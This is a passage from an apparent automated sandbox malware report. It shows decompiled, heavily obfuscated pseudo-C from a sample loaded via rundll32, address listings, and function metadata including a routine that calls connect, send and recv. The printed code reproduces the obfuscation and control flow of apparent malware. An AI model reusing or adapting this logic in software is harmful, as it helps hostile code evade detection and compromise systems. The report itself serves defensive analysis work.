				_v1624 = _v1624 * 0x29;
				_v1624 = _v1624 ^ 0x100ef306;
				_v1728 = 0x3e505e;
				_v1728 = _v1728 >> 8;
				_t613 = 0x3a;
				_v1728 = _v1728 / _t613;
				_v1728 = _v1728 ^ 0x00050efb;
				_v1752 = 0x3958e2;
				_v1752 = _v1752 ^ 0x62ae6d50;
				_v1752 = _v1752 ^ 0x97f7befb;
				_v1752 = _v1752 ^ 0xf561088c;
				_v1688 = 0xb21a91;
				_v1688 = _v1688 ^ 0x7ffc0397;
				_v1688 = _v1688 ^ 0x7f439e8f;
				_v1620 = 0xd8d2d1;
				_v1620 = _v1620 + 0x194e;
				_v1620 = _v1620 ^ 0x00d523c5;
				_v1696 = 0xa820cb;
				_v1696 = _v1696 + 0x8b3c;
				_v1696 = _v1696 ^ 0x00a28581;
				_v1680 = 0x121bc4;
				_t674 = 0x7a;
				_v1680 = _v1680 / _t674;
				_v1680 = _v1680 ^ 0x0006e996;
				_v1744 = 0x9924c6;
				_v1744 = _v1744 << 4;
				_t614 = 0x11;
				_v1744 = _v1744 * 0x36;
				_v1744 = _v1744 ^ 0x04d385a1;
				_v1632 = 0x653a8;
				_v1632 = _v1632 * 0x63;
				_v1632 = _v1632 ^ 0x027c9a7f;
				_v1672 = 0x158278;
				_v1672 = _v1672 + 0xffff088d;
				_v1672 = _v1672 ^ 0x001491ab;
				_v1832 = 0x486b88;
				_v1832 = _v1832 + 0xffff9f3d;
				_v1832 = _v1832 >> 3;
				_v1832 = _v1832 | 0x023d4c2b;
				_v1832 = _v1832 ^ 0x0230cd37;
				_v1612 = 0xd2c4ef;
				_v1612 = _v1612 * 0x5a;
				_v1612 = _v1612 ^ 0x4a177333;
				_v1776 = 0x829598;
				_v1776 = _v1776 << 0xe;
				_v1776 = _v1776 >> 2;
				_v1776 = _v1776 | 0x8c8c5501;
				_v1776 = _v1776 ^ 0xaddb19b6;
				_v1712 = 0x169d18;
				_v1712 = _v1712 / _t614;
				_v1712 = _v1712 >> 0xa;
				_v1712 = _v1712 ^ 0x000c26db;
				_v1704 = 0xb2b50;
				_v1704 = _v1704 ^ 0x2de07b8f;
				_v1704 = _v1704 ^ 0x2de0ad86;
				_v1800 = 0x9652d5;
				_t615 = 3;
				_v1800 = _v1800 * 0x68;
				_v1800 = _v1800 / _t615;
				_v1800 = _v1800 << 0xa;
				_v1800 = _v1800 ^ 0x6cd74e85;
				_v1664 = 0x74acab;
				_v1664 = _v1664 | 0xe18c4dd2;
				_v1664 = _v1664 ^ 0xe1f0b032;
				_v1824 = 0x58e83b;
				_t616 = 0x2c;
				_v1824 = _v1824 * 0x2b;
				_v1824 = _v1824 + 0xffff56af;
				_v1824 = _v1824 ^ 0x0c61ca29;
				_v1824 = _v1824 ^ 0x02809c1e;
				_v1764 = 0x974237;
				_v1764 = _v1764 << 0xb;
				_v1764 = _v1764 * 0x31;
				_v1764 = _v1764 ^ 0x9d674e65;
				_v1736 = 0xc3f98b;
				_v1736 = _v1736 * 0x5e;
				_v1736 = _v1736 | 0x641bd8e3;
				_v1736 = _v1736 ^ 0x67f85735;
				_v1700 = 0xe4f15c;
				_v1700 = _v1700 | 0xddaa88b0;
				_v1700 = _v1700 ^ 0xdde3c6d3;
				_v1844 = 0x9b3502;
				_v1844 = _v1844 ^ 0x47d60286;
				_v1844 = _v1844 / _t616;
				_v1844 = _v1844 ^ 0x0193d551;
				_v1640 = 0xffe1b1;
				_t617 = 0x39;
				_v1640 = _v1640 * 0x7b;
				_v1640 = _v1640 ^ 0x7af2e2c5;
				_v1808 = 0x2876e6;
				_v1808 = _v1808 | 0x109585e0;
				_v1808 = _v1808 << 0xd;
				_v1808 = _v1808 + 0x9cd3;
				_v1808 = _v1808 ^ 0xbefbba98;
				_v1676 = 0xd3b2e1;
				_v1676 = _v1676 << 0xf;
				_v1676 = _v1676 ^ 0xd9748eec;
				_v1836 = 0x3e007f;
				_v1836 = _v1836 + 0xffffe462;
				_v1836 = _v1836 >> 9;
				_v1836 = _v1836 >> 6;
				_v1836 = _v1836 ^ 0x000afa23;
				_v1684 = 0x2c402;
				_v1684 = _v1684 >> 0xa;
				_v1684 = _v1684 ^ 0x0000130c;
				_v1692 = 0x94252b;
				_v1692 = _v1692 / _t617;
				_v1692 = _v1692 ^ 0x000dcb04;
				_v1828 = 0xd5c7f6;
				_v1828 = _v1828 * 0x41;
				_v1828 = _v1828 + 0x5616;
				_v1828 = _v1828 >> 9;
				_v1828 = _v1828 ^ 0x001e39c7;
				_v1740 = 0xceff06;
				_v1740 = _v1740 << 0xe;
				_v1740 = _v1740 << 8;
				_v1740 = _v1740 ^ 0xc18fb5bb;
				_v1748 = 0x414330;
				_v1748 = _v1748 * 0x1d;
				_v1748 = _v1748 | 0x5a6f0d55;
				_v1748 = _v1748 ^ 0x5f6ea92a;
				_v1668 = 0xd2b255;
				_v1668 = _v1668 ^ 0xc5d7949e;
				_v1668 = _v1668 ^ 0xc50ba027;
				_v1796 = 0xab825d;
				_v1796 = _v1796 << 0xc;
				_v1796 = _v1796 + 0xd01b;
				_t618 = 0x22;
				_v1796 = _v1796 / _t618;
				_v1796 = _v1796 ^ 0x056bf222;
				_v1724 = 0x6f3f31;
				_v1724 = _v1724 + 0x5a62;
				_v1724 = _v1724 / _t674;
				_v1724 = _v1724 ^ 0x0002d040;
				_v1652 = 0x230f16;
				_v1652 = _v1652 ^ 0x902061d9;
				_v1652 = _v1652 ^ 0x9007a9ef;
				_v1804 = 0xb250d0;
				_v1804 = _v1804 << 7;
				_v1804 = _v1804 << 0xe;
				_v1804 = _v1804 >> 0x10;
				_v1804 = _v1804 ^ 0x000e0b76;
				_v1644 = 0x39b2ec;
				_v1644 = _v1644 >> 5;
				_v1644 = _v1644 ^ 0x0004ae9a;
				_v1708 = 0x41b5f8;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xfffffd74;
				_v1708 = _v1708 ^ 0x836650ae;
				_v1768 = 0xd924a5;
				_t619 = 0x26;
				_v1768 = _v1768 * 0x57;
				_v1768 = _v1768 >> 4;
				_v1768 = _v1768 ^ 0x04932b37;
				_v1788 = 0x72a9d;
				_v1788 = _v1788 >> 0xb;
				_v1788 = _v1788 * 0x3f;
				_v1788 = _v1788 + 0xffffc8d5;
				_v1788 = _v1788 ^ 0x000eb520;
				_v1628 = 0x50edf9;
				_v1628 = _v1628 * 0x73;
				_v1628 = _v1628 ^ 0x245d5801;
				_v1772 = 0x77fe3c;
				_v1772 = _v1772 + 0x89a9;
				_v1772 = _v1772 | 0x772eb6e7;
				_v1772 = _v1772 + 0xffffc435;
				_v1772 = _v1772 ^ 0x777a10e8;
				_v1780 = 0x481950;
				_v1780 = _v1780 >> 0xb;
				_v1780 = _v1780 | 0x104efd63;
				_v1780 = _v1780 + 0xffffd02c;
				_v1780 = _v1780 ^ 0x1043876c;
				_v1636 = 0x899427;
				_v1636 = _v1636 << 0x10;
				_v1636 = _v1636 ^ 0x942ef0bd;
				_v1812 = 0xafb495;
				_v1812 = _v1812 | 0xf73eef3e;
				_v1812 = _v1812 + 0xffffb280;
				_v1812 = _v1812 ^ 0xf7b4985a;
				_v1732 = 0xe6dab0;
				_v1732 = _v1732 + 0x38b;
				_v1732 = _v1732 | 0x5f912f35;
				_v1732 = _v1732 ^ 0x5ff91c81;
				_v1660 = 0xa1ff8d;
				_v1660 = _v1660 / _t619;
				_v1660 = _v1660 ^ 0x000a69c5;
				_v1820 = 0xd15a88;
				_v1820 = _v1820 ^ 0xcd50b9e8;
				_v1820 = _v1820 >> 0x10;
				_v1820 = _v1820 ^ 0xf9319330;
				_v1820 = _v1820 ^ 0xf933c487;
				_t675 = _v1600;
				while(1) {
					L1:
					while(1) {
						L2:
						_t620 = 0x424d9d2;
						do {
							L3:
							while(_t677 != 0x19ebf08) {
								if(_t677 == _t620) {
									_push(_v1600);
									_push(_v1808);
									_t585 = E007AD389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
									_t682 =  &(_t682[7]);
									__eflags = _t585;
									if(__eflags != 0) {
										E007A1E67(_v1676, _v1836, _v1684, _v1692, _v1596);
										E007A1E67(_v1828, _v1740, _v1748, _v1668, _v1592);
										_t682 =  &(_t682[6]);
									}
									L14:
									_t677 = 0x19ebf08;
									while(1) {
										L1:
										L2:
										_t620 = 0x424d9d2;
										goto L3;
									}
								}
								if(_t677 == 0x5bc69f5) {
									_t592 = E007AD2CE(_t620);
									__eflags = _t592 - E00793DE2(_t620);
									_t583 = 0x7574965;
									_t677 = 0x8166b1d;
									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
									goto L2;
								}
								if(_t677 == 0x8166b1d) {
									__eflags = _t675 - _t583;
									if(__eflags != 0) {
										_t677 = 0xd369ee2;
										continue;
									}
									_push(_t620);
									_push(_t620);
									_t606 = E007ABB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
									_t682 =  &(_t682[6]);
									__eflags = _t606;
									if(__eflags == 0) {
										L12:
										return _t606;
									}
									_t677 = 0xd369ee2;
									goto L1;
								}
								if(_t677 == 0xb42e112) {
									_t677 = 0x5bc69f5;
									continue;
								}
								if(_t677 == 0xd369ee2) {
									E007ADA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
									 *((short*)(E0079B6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
									E00798969(_v1688,  &_v524, __eflags, _v1620, _v1696);
									_push(_v1632);
									_push(_v1744);
									E007947CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E007ADCF7(_v1680, 0x791328, __eflags),  &_v524, _v1776, _v1712);
									E0079A8B0(_v1704, _t598, _v1800);
									_t603 = E0079EA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
									_t682 =  &(_t682[0x17]);
									__eflags = _t603;
									if(__eflags != 0) {
										_t583 = 0x7574965;
										__eflags = _t675 - 0x7574965;
										_t620 = 0x424d9d2;
										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
										continue;
									}
									goto L14;
								}
								_t696 = _t677 - 0xe2e667c;
								if(_t677 != 0xe2e667c) {
									goto L25;
								}
								_push(_v1804);
								_push( &_v1564);
								_push(_t620);
								_push(0);
								_push( &_v1596);
								_push(_v1652);
								_push(0);
								_t606 = E0079AB87(_v1796, _v1724, _t696);
								if(_t606 == 0) {
									goto L12;
								}
								E007A1E67(_v1644, _v1708, _v1768, _v1788, _v1596);
								return E007A1E67(_v1628, _v1772, _v1780, _v1636, _v1592);
							}
							E007A1E67(_v1812, _v1732, _v1660, _v1820, _v1600);
							_t682 =  &(_t682[3]);
							_t677 = 0xe6feec1;
							_t583 = 0x7574965;
							_t620 = 0x424d9d2;
							L25:
							__eflags = _t677 - 0xe6feec1;
						} while (__eflags != 0);
						return _t583;
					}
				}
			}






























































































                                                                                                                          0x007a6df8
                                                                                                                          0x007a6dfe
                                                                                                                          0x007a6e0b
                                                                                                                          0x007a6e14
                                                                                                                          0x007a6e1b
                                                                                                                          0x007a6e22
                                                                                                                          0x007a6e2d
                                                                                                                          0x007a6e38
                                                                                                                          0x007a6e40
                                                                                                                          0x007a6e4b
                                                                                                                          0x007a6e53
                                                                                                                          0x007a6e64
                                                                                                                          0x007a6e68
                                                                                                                          0x007a6e6a
                                                                                                                          0x007a6e6f
                                                                                                                          0x007a6e74
                                                                                                                          0x007a6e7c
                                                                                                                          0x007a6e87
                                                                                                                          0x007a6e92
                                                                                                                          0x007a6e9d
                                                                                                                          0x007a6ea8
                                                                                                                          0x007a6eb0
                                                                                                                          0x007a6ebb
                                                                                                                          0x007a6ec3
                                                                                                                          0x007a6ecb
                                                                                                                          0x007a6ed3
                                                                                                                          0x007a6edb
                                                                                                                          0x007a6ee3
                                                                                                                          0x007a6ef7
                                                                                                                          0x007a6efc
                                                                                                                          0x007a6f05
                                                                                                                          0x007a6f10
                                                                                                                          0x007a6f18
                                                                                                                          0x007a6f20
                                                                                                                          0x007a6f28
                                                                                                                          0x007a6f30
                                                                                                                          0x007a6f38
                                                                                                                          0x007a6f43
                                                                                                                          0x007a6f4b
                                                                                                                          0x007a6f56
                                                                                                                          0x007a6f5e
                                                                                                                          0x007a6f63
                                                                                                                          0x007a6f6b
                                                                                                                          0x007a6f73
                                                                                                                          0x007a6f7b
                                                                                                                          0x007a6f80
                                                                                                                          0x007a6f89
                                                                                                                          0x007a6f8a
                                                                                                                          0x007a6f8e
                                                                                                                          0x007a6f96
                                                                                                                          0x007a6fa1
                                                                                                                          0x007a6fa9
                                                                                                                          0x007a6fb4
                                                                                                                          0x007a6fbf
                                                                                                                          0x007a6fc7
                                                                                                                          0x007a6fd5
                                                                                                                          0x007a6fd9
                                                                                                                          0x007a6fe1
                                                                                                                          0x007a6fec
                                                                                                                          0x007a6ff7
                                                                                                                          0x007a7002
                                                                                                                          0x007a700d
                                                                                                                          0x007a7020
                                                                                                                          0x007a7027
                                                                                                                          0x007a7032
                                                                                                                          0x007a703d
                                                                                                                          0x007a7050
                                                                                                                          0x007a7055
                                                                                                                          0x007a705e
                                                                                                                          0x007a7069
                                                                                                                          0x007a7071
                                                                                                                          0x007a7079
                                                                                                                          0x007a7081
                                                                                                                          0x007a7089
                                                                                                                          0x007a7094
                                                                                                                          0x007a709f
                                                                                                                          0x007a70aa
                                                                                                                          0x007a70b5
                                                                                                                          0x007a70c0
                                                                                                                          0x007a70cb
                                                                                                                          0x007a70d6
                                                                                                                          0x007a70e1
                                                                                                                          0x007a70ec
                                                                                                                          0x007a70fe
                                                                                                                          0x007a7103
                                                                                                                          0x007a710c
                                                                                                                          0x007a7117
                                                                                                                          0x007a711f
                                                                                                                          0x007a7129
                                                                                                                          0x007a712c
                                                                                                                          0x007a7130
                                                                                                                          0x007a7138
                                                                                                                          0x007a714b
                                                                                                                          0x007a7152
                                                                                                                          0x007a715d
                                                                                                                          0x007a7168
                                                                                                                          0x007a7173
                                                                                                                          0x007a717e
                                                                                                                          0x007a7186
                                                                                                                          0x007a718e
                                                                                                                          0x007a7193
                                                                                                                          0x007a719b
                                                                                                                          0x007a71a3
                                                                                                                          0x007a71b6
                                                                                                                          0x007a71bd
                                                                                                                          0x007a71c8
                                                                                                                          0x007a71d0
                                                                                                                          0x007a71d5
                                                                                                                          0x007a71da
                                                                                                                          0x007a71e2
                                                                                                                          0x007a71ea
                                                                                                                          0x007a7200
                                                                                                                          0x007a7207
                                                                                                                          0x007a720f
                                                                                                                          0x007a721a
                                                                                                                          0x007a7225
                                                                                                                          0x007a7230
                                                                                                                          0x007a723b
                                                                                                                          0x007a7248
                                                                                                                          0x007a7249
                                                                                                                          0x007a7253
                                                                                                                          0x007a7257
                                                                                                                          0x007a725c
                                                                                                                          0x007a7264
                                                                                                                          0x007a726f
                                                                                                                          0x007a727a
                                                                                                                          0x007a7285
                                                                                                                          0x007a7296
                                                                                                                          0x007a7299
                                                                                                                          0x007a729d
                                                                                                                          0x007a72a5
                                                                                                                          0x007a72ad
                                                                                                                          0x007a72b5
                                                                                                                          0x007a72bd
                                                                                                                          0x007a72c7
                                                                                                                          0x007a72cb
                                                                                                                          0x007a72d3
                                                                                                                          0x007a72e6
                                                                                                                          0x007a72ed
                                                                                                                          0x007a72f8
                                                                                                                          0x007a7303
                                                                                                                          0x007a730e
                                                                                                                          0x007a7319
                                                                                                                          0x007a7324
                                                                                                                          0x007a732c
                                                                                                                          0x007a7344
                                                                                                                          0x007a7348
                                                                                                                          0x007a7350
                                                                                                                          0x007a7363
                                                                                                                          0x007a7366
                                                                                                                          0x007a736d
                                                                                                                          0x007a7378
                                                                                                                          0x007a7380
                                                                                                                          0x007a7388
                                                                                                                          0x007a738d
                                                                                                                          0x007a7395
                                                                                                                          0x007a739d
                                                                                                                          0x007a73a8
                                                                                                                          0x007a73b0
                                                                                                                          0x007a73bb
                                                                                                                          0x007a73c3
                                                                                                                          0x007a73cb
                                                                                                                          0x007a73d0
                                                                                                                          0x007a73d5
                                                                                                                          0x007a73dd
                                                                                                                          0x007a73e8
                                                                                                                          0x007a73f0
                                                                                                                          0x007a73fb
                                                                                                                          0x007a740f
                                                                                                                          0x007a7416
                                                                                                                          0x007a7421
                                                                                                                          0x007a742e
                                                                                                                          0x007a7432
                                                                                                                          0x007a743a
                                                                                                                          0x007a743f
                                                                                                                          0x007a7447
                                                                                                                          0x007a744f
                                                                                                                          0x007a7454
                                                                                                                          0x007a7459
                                                                                                                          0x007a7461
                                                                                                                          0x007a746e
                                                                                                                          0x007a7472
                                                                                                                          0x007a747a
                                                                                                                          0x007a7482
                                                                                                                          0x007a748d
                                                                                                                          0x007a7498
                                                                                                                          0x007a74a3
                                                                                                                          0x007a74ab
                                                                                                                          0x007a74b0
                                                                                                                          0x007a74be
                                                                                                                          0x007a74c8
                                                                                                                          0x007a74cc
                                                                                                                          0x007a74d4
                                                                                                                          0x007a74df
                                                                                                                          0x007a74f5
                                                                                                                          0x007a74fe
                                                                                                                          0x007a7509
                                                                                                                          0x007a7514
                                                                                                                          0x007a751f
                                                                                                                          0x007a752a
                                                                                                                          0x007a7532
                                                                                                                          0x007a7537
                                                                                                                          0x007a753c
                                                                                                                          0x007a7541
                                                                                                                          0x007a7549
                                                                                                                          0x007a7554
                                                                                                                          0x007a755c
                                                                                                                          0x007a7567
                                                                                                                          0x007a7572
                                                                                                                          0x007a757a
                                                                                                                          0x007a7585
                                                                                                                          0x007a7590
                                                                                                                          0x007a759d
                                                                                                                          0x007a759e
                                                                                                                          0x007a75a2
                                                                                                                          0x007a75a7
                                                                                                                          0x007a75af
                                                                                                                          0x007a75b7
                                                                                                                          0x007a75c1
                                                                                                                          0x007a75c5
                                                                                                                          0x007a75cd
                                                                                                                          0x007a75d5
                                                                                                                          0x007a75e8
                                                                                                                          0x007a75ef
                                                                                                                          0x007a75fa
                                                                                                                          0x007a7602
                                                                                                                          0x007a760a
                                                                                                                          0x007a7612
                                                                                                                          0x007a761a
                                                                                                                          0x007a7622
                                                                                                                          0x007a762a
                                                                                                                          0x007a762f
                                                                                                                          0x007a7637
                                                                                                                          0x007a763f
                                                                                                                          0x007a7647
                                                                                                                          0x007a7652
                                                                                                                          0x007a765a
                                                                                                                          0x007a7665
                                                                                                                          0x007a766d
                                                                                                                          0x007a7675
                                                                                                                          0x007a767d
                                                                                                                          0x007a7685
                                                                                                                          0x007a7690
                                                                                                                          0x007a769b
                                                                                                                          0x007a76a6
                                                                                                                          0x007a76b1
                                                                                                                          0x007a76c5
                                                                                                                          0x007a76cc
                                                                                                                          0x007a76d7
                                                                                                                          0x007a76df
                                                                                                                          0x007a76e7
                                                                                                                          0x007a76ec
                                                                                                                          0x007a76f4
                                                                                                                          0x007a76fc
                                                                                                                          0x007a7703
                                                                                                                          0x007a7703
                                                                                                                          0x007a7708
                                                                                                                          0x007a7708
                                                                                                                          0x007a7708
                                                                                                                          0x007a770d
                                                                                                                          0x00000000
                                                                                                                          0x007a770d
                                                                                                                          0x007a7717
                                                                                                                          0x007a799c
                                                                                                                          0x007a79aa
                                                                                                                          0x007a79ca
                                                                                                                          0x007a79cf
                                                                                                                          0x007a79d2
                                                                                                                          0x007a79d4
                                                                                                                          0x007a79fa
                                                                                                                          0x007a7a1f
                                                                                                                          0x007a7a24
                                                                                                                          0x007a7a24
                                                                                                                          0x007a78e9
                                                                                                                          0x007a78e9
                                                                                                                          0x007a7703
                                                                                                                          0x007a7703
                                                                                                                          0x007a7708
                                                                                                                          0x007a7708
                                                                                                                          0x00000000
                                                                                                                          0x007a7708
                                                                                                                          0x007a7703
                                                                                                                          0x007a7723
                                                                                                                          0x007a7977
                                                                                                                          0x007a7983
                                                                                                                          0x007a798a
                                                                                                                          0x007a798f
                                                                                                                          0x007a7994
                                                                                                                          0x00000000
                                                                                                                          0x007a7994
                                                                                                                          0x007a772f
                                                                                                                          0x007a7913
                                                                                                                          0x007a7915
                                                                                                                          0x007a7957
                                                                                                                          0x00000000
                                                                                                                          0x007a7957
                                                                                                                          0x007a7917
                                                                                                                          0x007a7918
                                                                                                                          0x007a793d
                                                                                                                          0x007a7942
                                                                                                                          0x007a7945
                                                                                                                          0x007a7947
                                                                                                                          0x007a77e4
                                                                                                                          0x007a77e4
                                                                                                                          0x007a77e4
                                                                                                                          0x007a794d
                                                                                                                          0x00000000
                                                                                                                          0x007a794d
                                                                                                                          0x007a773b
                                                                                                                          0x007a7909
                                                                                                                          0x00000000
                                                                                                                          0x007a7909
                                                                                                                          0x007a7747
                                                                                                                          0x007a7804
                                                                                                                          0x007a783e
                                                                                                                          0x007a7848
                                                                                                                          0x007a784d
                                                                                                                          0x007a7859
                                                                                                                          0x007a78a6
                                                                                                                          0x007a78b8
                                                                                                                          0x007a78dd
                                                                                                                          0x007a78e2
                                                                                                                          0x007a78e5
                                                                                                                          0x007a78e7
                                                                                                                          0x007a78f0
                                                                                                                          0x007a78fa
                                                                                                                          0x007a78fc
                                                                                                                          0x007a7901
                                                                                                                          0x00000000
                                                                                                                          0x007a7901
                                                                                                                          0x00000000
                                                                                                                          0x007a78e7
                                                                                                                          0x007a774d
                                                                                                                          0x007a7753
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a7759
                                                                                                                          0x007a7764
                                                                                                                          0x007a7765
                                                                                                                          0x007a7766
                                                                                                                          0x007a776f
                                                                                                                          0x007a7770
                                                                                                                          0x007a7782
                                                                                                                          0x007a7784
                                                                                                                          0x007a778e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a77ad
                                                                                                                          0x00000000
                                                                                                                          0x007a77d7
                                                                                                                          0x007a7a49
                                                                                                                          0x007a7a4e
                                                                                                                          0x007a7a51
                                                                                                                          0x007a7a56
                                                                                                                          0x007a7a5b
                                                                                                                          0x007a7a60
                                                                                                                          0x007a7a60
                                                                                                                          0x007a7a60
                                                                                                                          0x00000000
                                                                                                                          0x007a770d
                                                                                                                          0x007a7708

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                          • API String ID: 0-2206596976
                                                                                                                          • Opcode ID: ab9d6013328a83050dd89909d53a2598a7828cf8c1ec0ac91bb01357d901b5a7
                                                                                                                          • Instruction ID: 357176ce39462fdbeb8d2ac258af0c9d2ece5c7a9fbee6882754010181371b18
                                                                                                                          • Opcode Fuzzy Hash: ab9d6013328a83050dd89909d53a2598a7828cf8c1ec0ac91bb01357d901b5a7
                                                                                                                          • Instruction Fuzzy Hash: 6052FC71508381DBD378CF21C98AB9BBBE1BBC5308F108A1DE5DA96260D7B58949CF53
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10012C30 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 10012C6C
                                                                                                                          • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                          • _strcat.LIBCMT ref: 10012CE9
                                                                                                                          • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                          • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                            • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                            • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                            • Part of subcall function 1001DD46: GetDlgItem.USER32(?,0986EB69), ref: 1001DD53
                                                                                                                            • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                          • String ID: Connected$Disconnected$Wait...
                                                                                                                          • API String ID: 2263617321-2304371739
                                                                                                                          • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                          • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                          • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                          • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00792251 Relevance: 14.1, Strings: 11, Instructions: 340COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00792251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t323;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				void* _t382;
				signed int* _t424;
				void* _t427;
				void* _t428;
				void* _t431;

				_t425 = _a4;
				_push(_a12);
				_t424 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t323);
				_v104 = 0xfd7ba2;
				_t428 = _t427 + 0x14;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x03f5ee88;
				_t382 = 0x3e8dc94;
				_v112 = 0x53a35e;
				_t371 = 0x1c;
				_v112 = _v112 / _t371;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0x17ec1018;
				_v100 = 0x45b9a1;
				_v100 = _v100 + 0xffff7cfc;
				_v100 = _v100 ^ 0x004aa95b;
				_v92 = 0xd93693;
				_v92 = _v92 + 0xb87a;
				_v92 = _v92 ^ 0x00df4f59;
				_v160 = 0x746cf1;
				_v160 = _v160 ^ 0x2b133776;
				_v160 = _v160 + 0xffff944c;
				_v160 = _v160 / _t371;
				_v160 = _v160 ^ 0x0189d9d1;
				_v144 = 0x9ec305;
				_v144 = _v144 + 0xffffd43e;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04f670ec;
				_v148 = 0x64c482;
				_v148 = _v148 + 0x3823;
				_t372 = 0x6f;
				_v148 = _v148 / _t372;
				_v148 = _v148 ^ 0x000f1a49;
				_v68 = 0x131d36;
				_v68 = _v68 ^ 0xb06b804d;
				_v68 = _v68 ^ 0xb072f73d;
				_v124 = 0xcf68d3;
				_v124 = _v124 + 0x418a;
				_v124 = _v124 + 0xdb2c;
				_v124 = _v124 ^ 0x00d4c88c;
				_v140 = 0x60ea9a;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 >> 4;
				_v140 = _v140 ^ 0x0002f747;
				_v116 = 0xa906b8;
				_t373 = 0x61;
				_v116 = _v116 * 0x66;
				_v116 = _v116 / _t373;
				_v116 = _v116 ^ 0x00b9e105;
				_v152 = 0x1b4b23;
				_v152 = _v152 + 0x6529;
				_v152 = _v152 << 7;
				_v152 = _v152 ^ 0x0dd37b6c;
				_v56 = 0xb64e13;
				_t374 = 0x36;
				_v56 = _v56 / _t374;
				_v56 = _v56 ^ 0x000ccadc;
				_v180 = 0xa61587;
				_v180 = _v180 ^ 0x79fc160a;
				_t375 = 0x7a;
				_v180 = _v180 * 0x16;
				_v180 = _v180 ^ 0x4f1bf23d;
				_v180 = _v180 ^ 0x22abe71e;
				_v120 = 0x473252;
				_v120 = _v120 + 0xffff4692;
				_v120 = _v120 / _t375;
				_v120 = _v120 ^ 0x000f54d2;
				_v60 = 0x2fd158;
				_v60 = _v60 + 0x5b64;
